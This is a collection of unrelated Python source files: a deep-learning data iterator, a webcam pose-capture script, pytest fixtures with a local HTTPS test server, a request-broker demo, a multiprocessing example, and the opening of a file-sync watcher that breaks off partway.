self.next_batch[0].pad,
self.next_batch[0].index,
provide_data=self.provide_data,
provide_label=self.provide_label)
for i in self.data_ready:
i.clear()
for i in self.data_taken:
i.set()
return True
def next(self):
if self.iter_next():
return self.current_batch
else:
raise StopIteration
def getdata(self):
return self.current_batch.data
def getlabel(self):
return self.current_batch.label
def getindex(self):
return self.current_batch.index
def getpad(self):
return self.current_batch.pad
def _init_data(data, allow_empty, default_name):
"""Convert data into canonical form."""
assert (data is not None) or allow_empty
if data is None:
data = []
if isinstance(data, (np.ndarray, NDArray)):
data = [data]
if isinstance(data, list):
if not allow_empty:
assert(len(data) > 0)
if len(data) == 1:
data = OrderedDict([(default_name, data[0])]) # pylint: disable=redefined-variable-type
else:
data = OrderedDict( # pylint: disable=redefined-variable-type
[('_%d_%s' % (i, default_name), d) for i, d in enumerate(data)])
if not isinstance(data, dict):
raise TypeError("Input must be NDArray, numpy.ndarray, " + \
"a list of them or dict with them as values")
for k, v in data.items():
if not isinstance(v, NDArray):
try:
data[k] = array(v)
except:
raise TypeError(("Invalid type '%s' for %s, " % (type(v), k)) + \
"should be NDArray or numpy.ndarray")
return list(data.items())
class NDArrayIter(DataIter):
"""Iterating on either ``mx.nd.NDArray`` or ``numpy.ndarray``.
Parameters
----------
data: array or list of array or dict of string to array
Input data
label: array or list of array or dict of string to array, optional
Input label
batch_size: int
Batch Size
shuffle: bool, optional
Whether to shuffle the data
last_batch_handle : str, optional
How to handle the last batch, can be 'pad', 'discard' or
'roll_over'. 'roll_over' is intended for training and can cause problems
if used for prediction.
data_name : str, optional
The data name
label_name : str, optional
The label name
"""
def __init__(self, data, label=None, batch_size=1, shuffle=False,
last_batch_handle='pad', data_name='data',
label_name='softmax_label'):
super(NDArrayIter, self).__init__(batch_size)
self.data = _init_data(data, allow_empty=False, default_name=data_name)
self.label = _init_data(label, allow_empty=True, default_name=label_name)
# shuffle data
if shuffle:
idx = np.arange(self.data[0][1].shape[0])
np.random.shuffle(idx)
self.data = [(k, array(v.asnumpy()[idx], v.context)) for k, v in self.data]
self.label = [(k, array(v.asnumpy()[idx], v.context)) for k, v in self.label]
# batching
if last_batch_handle == 'discard':
new_n = self.data[0][1].shape[0] - self.data[0][1].shape[0] % batch_size
data_dict = OrderedDict(self.data)
label_dict = OrderedDict(self.label)
for k, _ in self.data:
data_dict[k] = data_dict[k][:new_n]
for k, _ in self.label:
label_dict[k] = label_dict[k][:new_n]
self.data = data_dict.items()
self.label = label_dict.items()
self.data_list = [x[1] for x in self.data] + [x[1] for x in self.label]
self.num_source = len(self.data_list)
self.num_data = self.data_list[0].shape[0]
assert self.num_data >= batch_size, \
"batch_size need to be smaller than data size."
self.cursor = -batch_size
self.batch_size = batch_size
self.last_batch_handle = last_batch_handle
@property
def provide_data(self):
"""The name and shape of data provided by this iterator."""
return [
DataDesc(k, tuple([self.batch_size] + list(v.shape[1:])), v.dtype)
for k, v in self.data
]
@property
def provide_label(self):
"""The name and shape of label provided by this iterator."""
return [
DataDesc(k, tuple([self.batch_size] + list(v.shape[1:])), v.dtype)
for k, v in self.label
]
def hard_reset(self):
"""Ignore roll over data and set to start."""
self.cursor = -self.batch_size
def reset(self):
if self.last_batch_handle == 'roll_over' and self.cursor > self.num_data:
self.cursor = -self.batch_size + (self.cursor%self.num_data)%self.batch_size
else:
self.cursor = -self.batch_size
def iter_next(self):
self.cursor += self.batch_size
return self.cursor < self.num_data
def next(self):
if self.iter_next():
return DataBatch(data=self.getdata(), label=self.getlabel(), \
pad=self.getpad(), index=None)
else:
raise StopIteration
def _getdata(self, data_source):
"""Load data from underlying arrays, internal use only."""
assert(self.cursor < self.num_data), "DataIter needs reset."
if self.cursor + self.batch_size <= self.num_data:
return [x[1][self.cursor:self.cursor+self.batch_size] for x in data_source]
else:
pad = self.batch_size - self.num_data + self.cursor
return [concatenate([x[1][self.cursor:], x[1][:pad]]) for x in data_source]
def getdata(self):
return self._getdata(self.data)
def getlabel(self):
return self._getdata(self.label)
def getpad(self):
if self.last_batch_handle == 'pad' and \
self.cursor + self.batch_size > self.num_data:
return self.cursor + self.batch_size - self.num_data
else:
return 0
class MXDataIter(DataIter):
"""A python wrapper a C++ data iterator.
Parameters
----------
handle : DataIterHandle
The handle to the underlying C++ Data Iterator.
"""
def __init__(self, handle, data_name='data', label_name='softmax_label', **_):
super(MXDataIter, self).__init__()
self.handle = handle
# debug option, used to test the speed with io effect eliminated
self._debug_skip_load = False
# load the first batch to get shape information
self.first_batch = None
self.first_batch = self.next()
data = self.first_batch.data[0]
label = self.first_batch.label[0]
# properties
self.provide_data = [DataDesc(data_name, data.shape, data.dtype)]
self.provide_label = [DataDesc(label_name, label.shape, label.dtype)]
self.batch_size = data.shape[0]
def __del__(self):
check_call(_LIB.MXDataIterFree(self.handle))
def debug_skip_load(self):
# Set the iterator to simply return always first batch. This can be used
# to test the speed of network without taking the loading delay into
# account.
self._debug_skip_load = True
logging.info('Set debug_skip_load to be true, will simply return first batch')
def reset(self):
self._debug_at_begin = True
self.first_batch = None
check_call(_LIB.MXDataIterBeforeFirst(self.handle))
def next(self):
if self._debug_skip_load and not self._debug_at_begin:
return DataBatch(data=[self.getdata()], label=[self.getlabel()], pad=self.getpad(),
index=self.getindex())
if self.first_batch is not None:
batch = self.first_batch
self.first_batch = None
return batch
self._debug_at_begin = False
next_res = ctypes.c_int(0)
check_call(_LIB.MXDataIterNext(self.handle, ctypes.byref(next_res)))
if next_res.value:
return DataBatch(data=[self.getdata()], label=[self.getlabel()], pad=self.getpad(),
index=self.getindex())
else:
raise StopIteration
def iter_next(self):
if self.first_batch is not None:
return True
next_res = ctypes.c_int(0)
check_call(_LIB.MXDataIterNext(self.handle, ctypes.byref(next_res)))
return next_res.value
def getdata(self):
hdl = NDArrayHandle()
check_call(_LIB.MXDataIterGetData(self.handle, ctypes.byref(hdl)))
return NDArray(hdl, False)
def getlabel(self):
hdl = NDArrayHandle()
check_call(_LIB.MXDataIterGetLabel(self.handle, ctypes.byref(hdl)))
return NDArray(hdl, False)
def getindex(self):
index_size = ctypes.c_uint64(0)
index_data = ctypes.POINTER(ctypes.c_uint64)()
check_call(_LIB.MXDataIterGetIndex(self.handle,
ctypes.byref(index_data),
ctypes.byref(index_size)))
address = ctypes.addressof(index_data.contents)
dbuffer = (ctypes.c_uint64* index_size.value).from_address(address)
np_index = np.frombuffer(dbuffer, dtype=np.uint64)
return np_index.copy()
def getpad(self):
pad = ctypes.c_int(0)
check_call(_LIB.MXDataIterGetPadNum(self.handle, ctypes.byref(pad)))
return pad.value
def _make_io_iterator(handle):
"""Create an io iterator by handle."""
name = ctypes.c_char_p()
desc = ctypes.c_char_p()
num_args = mx_uint()
arg_names = ctypes.POINTER(ctypes.c_char_p)()
arg_types = ctypes.POINTER(ctypes.c_char_p)()
arg_descs = ctypes.POINTER(ctypes.c_char_p)()
check_call(_LIB.MXDataIterGetIterInfo( \
handle, ctypes.byref(name), ctypes.byref(desc), \
ctypes.byref(num_args), \
ctypes.byref(arg_names), \
ctypes.byref(arg_types), \
ctypes.byref(arg_descs)))
iter_name = py_str(name.value)
narg = int(num_args.value)
param_str = _build_param_doc(
[py_str(arg_names[i]) for i in range(narg)],
[py_str(arg_types[i]) for i in range(narg)],
[py_str(arg_descs[i]) for i in range(narg)])
doc_str = ('%s\n\n' +
'%s\n' +
'Returns\n' +
'-------\n' +
'MXDataIter\n'+
' The result iterator.')
doc_str = doc_str % (desc.value, param_str)
def creator(*args, **kwargs):
"""Create an iterator.
The parameters listed below can be passed in as keyword arguments.
Parameters
----------
name : string, required.
Name of the resulting data iterator.
Returns
-------
dataiter: Dataiter
The resulting data iterator.
"""
param_keys = []
param_vals = []
for k, val in kwargs.items():
param_keys.append(c_str(k))
param_vals.append(c_str(str(val)))
# create atomic symbol
param_keys = c_array(ctypes.c_char_p, param_keys)
param_vals = c_array(ctypes.c_char_p, param_vals)
iter_handle = DataIterHandle()
check_call(_LIB.MXDataIterCreateIter(
handle,
mx_uint(len(param_keys)),
param_keys, param_vals,
ctypes.byref(iter_handle)))
if len(args):
raise TypeError('%s can only accept keyword arguments' % iter_name)
return MXDataIter(iter_handle, **kwargs)
creator.__name__ = iter_name
creator.__doc__ = doc_str
return creator
def _init_io_module():
"""List and add all the data iterators to current module."""
plist = ctypes.POINTER(ctypes.c_void_p)()
size = ctypes.c_uint()
check_call(_LIB.MXListDataIters(ctypes.byref(size), ctypes.byref(plist)))
module_obj = sys.modules[__name__]
for i in range(size.value):
hdl = ctypes.c_void_p(plist[i])
dataiter = _make_io_iterator(hdl)
setattr(module_obj, dataiter.__name__, dataiter)
_init_io_module()
|
movementSampler2.py
|
#!/usr/bin/env python3.5
import argparse
import logging
import time
import cv2
import numpy as np
import tensorflow as tf
from tf_pose import common
from tf_pose.estimator import TfPoseEstimator
from tf_pose.networks import get_graph_path, model_wh
import datetime
from threading import Thread
import pickle
import io
# This file(run_webcam.py) is heavily changed to capture
# and store standard pose data for further machine learning
class WebcamVideoStream:
def __init__(self, capture):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = capture
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
# define binery data
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
# define integer data
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
# define float data
def _float32_feature(value):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
logger = logging.getLogger('TfPoseEstimator-WebCam')
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
def textCountdown(t, mString):
progressBar = '>>>>>>>>>'
while t:
print(progressBar + mString + str(t))
time.sleep(1)
t -= 1
progressBar += '>>>>>>>>>'
def captureImage(recordTypeNum, recording_time,recording_interval, vs, imageList):
recordTypes = ['000 GOOD MOVES 000','111 BAD MOVES 111']
recordTypeString = recordTypes[recordTypeNum]
textCountdown(3, 'Capture session' + recordTypeString +' start in :' )
start_time = time.time()
while True:
if ((time.time() - start_time) >= recording_time):
print('Time up!')
break
else:
image = vs.read()
group_index =int(np.floor((time.time() - start_time)/recording_interval))
print('adding image to group:' + str(group_index) )
imageList[group_index] += [image]
# cv2.putText(image,str(len(HumanFrames)),(10, 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
cv2.imshow('tf-pose-estimation result', image)
image = None
if cv2.waitKey(1) == 27:
break
cv2.waitKey(10)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='tf-pose-estimation realtime webcam')
parser.add_argument('--camera', type=int, default=0)
parser.add_argument('--resize', type=str, default='304x224',
help='if provided, resize images before they are processed. default=0x0, Recommends : 432x368 or 656x368 or 1312x736 ')
parser.add_argument('--resize-out-ratio', type=float, default=4.0,
help='if provided, resize heatmaps before they are post-processed. default=1.0')
parser.add_argument('--model', type=str, default='mobilenet_thin', help='cmu / mobilenet_thin')
parser.add_argument('--show-process', type=bool, default=False,
help='for debug purpose, if enabled, speed for inference is dropped.')
args = parser.parse_args()
logger.debug('initialization %s : %s' % (args.model, get_graph_path(args.model)))
w, h = model_wh(args.resize)
if w > 0 and h > 0:
e = TfPoseEstimator(get_graph_path(args.model), target_size=(w, h))
else:
e = TfPoseEstimator(get_graph_path(args.model), target_size=(432, 368))
logger.debug('cam read+')
cam = cv2.VideoCapture(args.camera)
print("WebcamVideoStream instance 'vs' is created")
vs = WebcamVideoStream(cam).start()
#frameNumber = 0
goodSampleSize = 5
badSampleSize = 5
recording_time = 4.0
recording_interval = 0.2
groupNumber = np.floor(recording_time / recording_interval)
imageSetGood = []
imageSetBad = []
dataSet = []
exerciseName = 'torsoTwist'
for i in range(int(groupNumber)):
imageSetGood.append([])
for i in range(int(groupNumber)):
imageSetBad.append([])
for i in range(int(groupNumber)):
dataSet.append([])
# label for good moves:0 / bad moves: 1
labelSet=[]
for i in range(int(groupNumber)):
labelSet.append([])
body = []
timeRatio = []
#process time of pose estimation with current setting is about 0.125 sec/frame
#frameLimit = int(round(recording_time/0.125))
#print('Limit of frame number is:' + str(frameLimit))
#Target exercises:In situ high knee / wood chop / Plank*40Sec
print(exerciseName +', left *1 right *1 ,recording time=' + str(recording_time) + 'Secs')
for i in range(goodSampleSize):
captureImage(0,recording_time,recording_interval,vs,imageSetGood)
for i in range(badSampleSize):
captureImage(1, recording_time, recording_interval, vs, imageSetBad)
for i in range(int(groupNumber)):
print('processing Good Sample of group number:' +str(i))
for image in imageSetGood[i]:
temp = []
imageC = image.copy()
humans = e.inference(imageC, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)
#print(humans)
if ((humans != []) & (len(humans)==1)):
for human in humans:
for j in range(common.CocoPart.Background.value):
if j not in human.body_parts.keys():
temp.append(0.0)
temp.append(0.0)
continue
body_part = human.body_parts[j]
coord = [body_part.x, body_part.y]
temp.append(coord[0])
temp.append(coord[1])
dataSet[i].append(temp)
labelSet[i].append(0)
#imageC = TfPoseEstimator.draw_humans(imageC, humans, imgcopy=False)
#cv2.imshow("process result", imageC)
imageC = None
#cv2.waitKey(5)
for i in range(int(groupNumber)):
print('processing Bad sample of group number:' + str(i))
for image in imageSetBad[i]:
temp = []
imageC = image.copy()
humans = e.inference(imageC, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)
#print(humans)
if ((humans != []) & (len(humans) == 1)):
for human in humans:
for j in range(common.CocoPart.Background.value):
if j not in human.body_parts.keys():
temp.append(0.0)
temp.append(0.0)
continue
body_part = human.body_parts[j]
coord = [body_part.x, body_part.y]
temp.append(coord[0])
temp.append(coord[1])
dataSet[i].append(temp)
labelSet[i].append(1)
#imageC = TfPoseEstimator.draw_humans(imageC, humans, imgcopy=False)
#cv2.imshow("process result", imageC)
imageC = None
#cv2.waitKey(5)
#Free memory space for better processing speed
del imageSetGood
del imageSetBad
print('image set flushed!!')
#Restart imageSets
imageSetGood = []
imageSetBad = []
for i in range(int(groupNumber)):
imageSetGood.append([])
for i in range(int(groupNumber)):
imageSetBad.append([])
print(exerciseName+', left *1 right *1 ,recording time=' + str(recording_time) + 'Secs')
for i in range(goodSampleSize):
captureImage(0, recording_time, recording_interval, vs, imageSetGood)
for i in range(badSampleSize):
captureImage(1, recording_time, recording_interval, vs, imageSetBad)
for i in range(int(groupNumber)):
print('processing Good Sample of group number:' + str(i))
for image in imageSetGood[i]:
temp = []
imageC = image.copy()
humans = e.inference(imageC, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)
#print(humans)
if ((humans != []) & (len(humans) == 1)):
for human in humans:
for j in range(common.CocoPart.Background.value):
if j not in human.body_parts.keys():
temp.append(0.0)
temp.append(0.0)
continue
body_part = human.body_parts[j]
coord = [body_part.x, body_part.y]
temp.append(coord[0])
temp.append(coord[1])
dataSet[i].append(temp)
labelSet[i].append(0)
# imageC = TfPoseEstimator.draw_humans(imageC, humans, imgcopy=False)
# cv2.imshow("process result", imageC)
imageC = None
# cv2.waitKey(5)
for i in range(int(groupNumber)):
print('processing Bad sample of group number:' + str(i))
for image in imageSetBad[i]:
temp = []
imageC = image.copy()
humans = e.inference(imageC, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)
#print(humans)
if ((humans != []) & (len(humans) == 1)):
for human in humans:
for j in range(common.CocoPart.Background.value):
if j not in human.body_parts.keys():
temp.append(0.0)
temp.append(0.0)
continue
body_part = human.body_parts[j]
coord = [body_part.x, body_part.y]
temp.append(coord[0])
temp.append(coord[1])
dataSet[i].append(temp)
labelSet[i].append(1)
# imageC = TfPoseEstimator.draw_humans(imageC, humans, imgcopy=False)
# cv2.imshow("process result", imageC)
imageC = None
# cv2.waitKey(5)
# Free memory space for better processing speed
del imageSetGood
del imageSetBad
print('image set flushed!!')
# Restart imageSets
imageSetGood = []
imageSetBad = []
for i in range(int(groupNumber)):
imageSetGood.append([])
for i in range(int(groupNumber)):
imageSetBad.append([])
print(exerciseName+', left *1 right *1 ,recording time=' + str(recording_time) + 'Secs')
for i in range(goodSampleSize):
captureImage(0, recording_time, recording_interval, vs, imageSetGood)
for i in range(badSampleSize):
captureImage(1, recording_time, recording_interval, vs, imageSetBad)
for i in range(int(groupNumber)):
print('processing Good Sample of group number:' + str(i))
for image in imageSetGood[i]:
temp = []
imageC = image.copy()
humans = e.inference(imageC, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)
# print(humans)
if ((humans != []) & (len(humans) == 1)):
for human in humans:
for j in range(common.CocoPart.Background.value):
if j not in human.body_parts.keys():
temp.append(0.0)
temp.append(0.0)
continue
body_part = human.body_parts[j]
coord = [body_part.x, body_part.y]
temp.append(coord[0])
temp.append(coord[1])
dataSet[i].append(temp)
labelSet[i].append(0)
# imageC = TfPoseEstimator.draw_humans(imageC, humans, imgcopy=False)
# cv2.imshow("process result", imageC)
imageC = None
# cv2.waitKey(5)
for i in range(int(groupNumber)):
print('processing Bad sample of group number:' + str(i))
for image in imageSetBad[i]:
temp = []
imageC = image.copy()
humans = e.inference(imageC, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)
# print(humans)
if ((humans != []) & (len(humans) == 1)):
for human in humans:
for j in range(common.CocoPart.Background.value):
if j not in human.body_parts.keys():
temp.append(0.0)
temp.append(0.0)
continue
body_part = human.body_parts[j]
coord = [body_part.x, body_part.y]
temp.append(coord[0])
temp.append(coord[1])
dataSet[i].append(temp)
labelSet[i].append(1)
# imageC = TfPoseEstimator.draw_humans(imageC, humans, imgcopy=False)
# cv2.imshow("process result", imageC)
imageC = None
# cv2.waitKey(5)
print(dataSet)
print(labelSet)
print(np.shape(dataSet))
print(np.shape(labelSet))
output = open( exerciseName+'Data3.pkl', 'wb')
pickle.dump(dataSet, output)
output.close()
output = open(exerciseName+'Label3.pkl', 'wb')
pickle.dump(labelSet, output)
output.close()
pkl_file = open(exerciseName+'Data3.pkl', 'rb')
highKneeData = pickle.load(pkl_file)
pkl_file.close()
print(highKneeData)
pkl_file = open(exerciseName + 'Label3.pkl', 'rb')
highKneeLabel = pickle.load(pkl_file)
pkl_file.close()
print(highKneeLabel)
cv2.destroyAllWindows()
vs.stop()
|
conftest.py
|
import asyncio
import json
import os
import threading
import time
import typing
import pytest
import trustme
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.serialization import (
BestAvailableEncryption,
Encoding,
PrivateFormat,
load_pem_private_key,
)
from uvicorn.config import Config
from uvicorn.main import Server
from httpx import URL
from tests.concurrency import sleep
ENVIRONMENT_VARIABLES = {
"SSL_CERT_FILE",
"SSL_CERT_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"ALL_PROXY",
"NO_PROXY",
"SSLKEYLOGFILE",
}
@pytest.fixture(
params=[
pytest.param("asyncio", marks=pytest.mark.asyncio),
pytest.param("trio", marks=pytest.mark.trio),
]
)
def async_environment(request: typing.Any) -> str:
"""
Mark a test function to be run on both asyncio and trio.
Equivalent to having a pair of tests, each respectively marked with
'@pytest.mark.asyncio' and '@pytest.mark.trio'.
Intended usage:
```
@pytest.mark.usefixtures("async_environment")
async def my_async_test():
...
```
"""
return request.param
@pytest.fixture(scope="function", autouse=True)
def clean_environ() -> typing.Dict[str, typing.Any]:
"""Keeps os.environ clean for every test without having to mock os.environ"""
original_environ = os.environ.copy()
os.environ.clear()
os.environ.update(
{
k: v
for k, v in original_environ.items()
if k not in ENVIRONMENT_VARIABLES and k.lower() not in ENVIRONMENT_VARIABLES
}
)
yield
os.environ.clear()
os.environ.update(original_environ)
async def app(scope, receive, send):
assert scope["type"] == "http"
if scope["path"].startswith("/slow_response"):
await slow_response(scope, receive, send)
elif scope["path"].startswith("/premature_close"):
await premature_close(scope, receive, send)
elif scope["path"].startswith("/status"):
await status_code(scope, receive, send)
elif scope["path"].startswith("/echo_body"):
await echo_body(scope, receive, send)
elif scope["path"].startswith("/echo_headers"):
await echo_headers(scope, receive, send)
elif scope["path"].startswith("/redirect_301"):
await redirect_301(scope, receive, send)
else:
await hello_world(scope, receive, send)
async def hello_world(scope, receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def slow_response(scope, receive, send):
await sleep(1.0)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def premature_close(scope, receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
async def status_code(scope, receive, send):
status_code = int(scope["path"].replace("/status/", ""))
await send(
{
"type": "http.response.start",
"status": status_code,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def echo_body(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": body})
async def echo_headers(scope, receive, send):
body = {}
for name, value in scope.get("headers", []):
body[name.capitalize().decode()] = value.decode()
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"application/json"]],
}
)
await send({"type": "http.response.body", "body": json.dumps(body).encode()})
async def redirect_301(scope, receive, send):
await send(
{"type": "http.response.start", "status": 301, "headers": [[b"location", b"/"]]}
)
await send({"type": "http.response.body"})
SERVER_SCOPE = "session"
@pytest.fixture(scope=SERVER_SCOPE)
def cert_authority():
return trustme.CA()
@pytest.fixture(scope=SERVER_SCOPE)
def ca_cert_pem_file(cert_authority):
with cert_authority.cert_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def localhost_cert(cert_authority):
return cert_authority.issue_cert("localhost")
@pytest.fixture(scope=SERVER_SCOPE)
def cert_pem_file(localhost_cert):
with localhost_cert.cert_chain_pems[0].tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_private_key_file(localhost_cert):
with localhost_cert.private_key_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_encrypted_private_key_file(localhost_cert):
# Deserialize the private key and then reserialize with a password
private_key = load_pem_private_key(
localhost_cert.private_key_pem.bytes(), password=None, backend=default_backend()
)
encrypted_private_key_pem = trustme.Blob(
private_key.private_bytes(
Encoding.PEM,
PrivateFormat.TraditionalOpenSSL,
BestAvailableEncryption(password=b"password"),
)
)
with encrypted_private_key_pem.tempfile() as tmp:
yield tmp
class TestServer(Server):
@property
def url(self) -> URL:
protocol = "https" if self.config.is_ssl else "http"
return URL(f"{protocol}://{self.config.host}:{self.config.port}/")
def install_signal_handlers(self) -> None:
# Disable the default installation of handlers for signals such as SIGTERM,
# because it can only be done in the main thread.
pass
async def serve(self, sockets=None):
self.restart_requested = asyncio.Event()
loop = asyncio.get_event_loop()
tasks = {
loop.create_task(super().serve(sockets=sockets)),
loop.create_task(self.watch_restarts()),
}
await asyncio.wait(tasks)
async def restart(self) -> None:
# This coroutine may be called from a different thread than the one the
# server is running on, and from an async environment that's not asyncio.
# For this reason, we use an event to coordinate with the server
# instead of calling shutdown()/startup() directly, and should not make
# any asyncio-specific operations.
self.started = False
self.restart_requested.set()
while not self.started:
await sleep(0.2)
async def watch_restarts(self):
while True:
if self.should_exit:
return
try:
await asyncio.wait_for(self.restart_requested.wait(), timeout=0.1)
except asyncio.TimeoutError:
continue
self.restart_requested.clear()
await self.shutdown()
await self.startup()
def serve_in_thread(server: Server):
thread = threading.Thread(target=server.run)
thread.start()
try:
while not server.started:
time.sleep(1e-3)
yield server
finally:
server.should_exit = True
thread.join()
@pytest.fixture(scope=SERVER_SCOPE)
def server():
config = Config(app=app, lifespan="off", loop="asyncio")
server = TestServer(config=config)
yield from serve_in_thread(server)
@pytest.fixture(scope=SERVER_SCOPE)
def https_server(cert_pem_file, cert_private_key_file):
config = Config(
app=app,
lifespan="off",
ssl_certfile=cert_pem_file,
ssl_keyfile=cert_private_key_file,
host="localhost",
port=8001,
loop="asyncio",
)
server = TestServer(config=config)
yield from serve_in_thread(server)
|
BrokerDemo.py
|
# (C) Copyright 2021 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
#
import os
import random
import threading
import time
from queueos import Broker, Environment, FunctionFactory, Request
# This demo simulates a random workload, turn on and off the
# availability of adaptors, and change the number of workers. The QoS
# rules are expressed in the file 'broker.rules' in the same directory.
USERS = ["alice", "bob", "carlos", "david", "erin", "frank"]
DATASETS = ["dataset-1", "dataset-2", "dataset-3"]
ADAPTORS = ["adaptor1", "adaptor2"]
environment = Environment()
FunctionFactory.register_function(
"dataset",
lambda context, *args: context.request.dataset,
)
FunctionFactory.register_function(
"adaptor",
lambda context, *args: context.request.adaptor,
)
class DemoRequest(Request):
def __init__(self, user, dataset, adaptor):
super().__init__()
self.user = user
self.dataset = dataset
self.adaptor = adaptor
self.cost = (0, 0)
def execute(self):
sleep = random.randint(0, 20)
print(self, f"Running for {sleep} seconds")
time.sleep(sleep)
if random.randint(1, 10) == 1:
raise Exception(f"{self} failed!!")
def __repr__(self):
return f"R-{self.id}-{self.user}-{self.dataset}-{self.adaptor}"
broker = Broker(
os.path.join(os.path.dirname(__file__), "broker.rules"),
4,
environment,
)
RUN_UPDATE = True
def update_config():
while broker.known_requests:
time.sleep(20)
adaptor = "adaptor1" if random.randint(0, 1) else "adaptor2"
if random.randint(0, 1):
environment.enable_resource(adaptor)
else:
environment.disable_resource(adaptor)
broker.set_number_of_workers(random.randint(0, 5))
print("----------------------")
broker.status()
print("----------------------")
broker.pause()
for j in range(40):
broker.enqueue(
DemoRequest(
user=random.choice(USERS),
dataset=random.choice(DATASETS),
adaptor=random.choice(ADAPTORS),
)
)
threading.Thread(target=update_config, daemon=True).start()
broker.resume()
print("END OF WORK - FLUSHING")
broker.shutdown()
print("THE END")
|
parallel-mp.py
|
import multiprocessing as mp
import time
def task(i):
print("sleeping ",i)
time.sleep(3)
print("awakening ",i)
if __name__ == '__main__':
jobs = []
for i in range(4):
p = mp.Process(target=task,args=[i])
p.start()
jobs.append(p)
for p in jobs:
p.join()
|
watch_sync.py
|
import logging
import os
import queue
import threading
from datetime import datetime
import watchdog.events
import watchdog.observers
from . import path_match
from .file_trees import compare_file_trees, get_remote_mtime
from .models import ChangeEventType, FsChangeEvent
from .pubsub import Messages
class TimestampDatabase(object):
def __init__(self, initial_data=None):
"""
Keep track of paths and timestamps associated with those paths.
Not thread-safe
"""
if initial_data is None:
self._data = {}
else:
self._data = initial_data
def __str__(self):
return str(self._data)
def get(self, path, default=datetime.min):
return self._data.get(path, default)
def remove(self, path):
try:
del self._data[path]
except KeyError:
logging.info(
"Path {} did not exist in timestamp database".format(path)
)
def _was_modified_since(self, path, timestamp):
current_timestamp = self._data.get(path, datetime.min)
return current_timestamp > timestamp
def update_if_newer(self, path, timestamp):
if not self._was_modified_since(path, timestamp):
self._data[path] = timestamp
@classmethod
def from_fs_objects(cls, fs_objects):
_data = {}
for fs_object in fs_objects:
last_modified = fs_object.attrs.last_modified
_data[fs_object.path] = last_modified
return cls(_data)
class ListableQueue(queue.Queue):
def items(self):
return [item for item in self.queue]
class FileSystemChangeHandler(watchdog.events.FileSystemEventHandler):
watchdog_event_lookup = {
watchdog.events.EVENT_TYPE_CREATED: ChangeEventType.CREATED,
watchdog.events.EVENT_TYPE_MOVED: ChangeEventType.MOVED,
watchdog.events.EVENT_TYPE_MODIFIED: ChangeEventType.MODIFIED,
watchdog.events.EVENT_TYPE_DELETED: ChangeEventType.DELETED,
}
def __init__(self, queue, local_dir, excluded_patterns):
self.queue = queue
self.local_dir = local_dir
self._excluded_patterns = excluded_patterns
def on_any_event(self, watchdog_event):
logging.info("Registered filesystem event {}".format(watchdog_event))
event_type = self.watchdog_event_lookup[watchdog_event.event_type]
is_directory = watchdog_event.is_directory
path = self._relpath(watchdog_event.src_path)
if path_match.matches_any_of(path, self._excluded_patterns):
logging.info(
"Ignoring change event {} as it is in list of excluded patterns.".format(
watchdog_event
)
)
elif event_type == ChangeEventType.MODIFIED and is_directory:
# Ignore directory mtime changes
pass
else:
if event_type == ChangeEventType.MOVED:
dest_path = watchdog_event.dest_path
abs_local_dir = os.path.abspath(self.local_dir)
if os.path.abspath(dest_path).startswith(abs_local_dir):
event = FsChangeEvent(
event_type,
is_directory,
path,
extra_args={"dest_path": self._relpath(dest_path)},
)
else:
# File was moved outside of the area we're watching:
# treat as deletion
event = FsChangeEvent(
ChangeEventType.DELETED,
is_directory,
path,
extra_args=None,
)
else:
event = FsChangeEvent(
event_type, is_directory, path, extra_args=None
)
self.queue.put(event)
def _relpath(self, path):
return os.path.relpath(path, start=self.local_dir)
class Uploader(object):
def __init__(self, queue, synchronizer, monitor, exchange):
self._queue = queue
self._synchronizer = synchronizer
self._stop_event = threading.Event()
self._monitor = monitor
self._thread = None
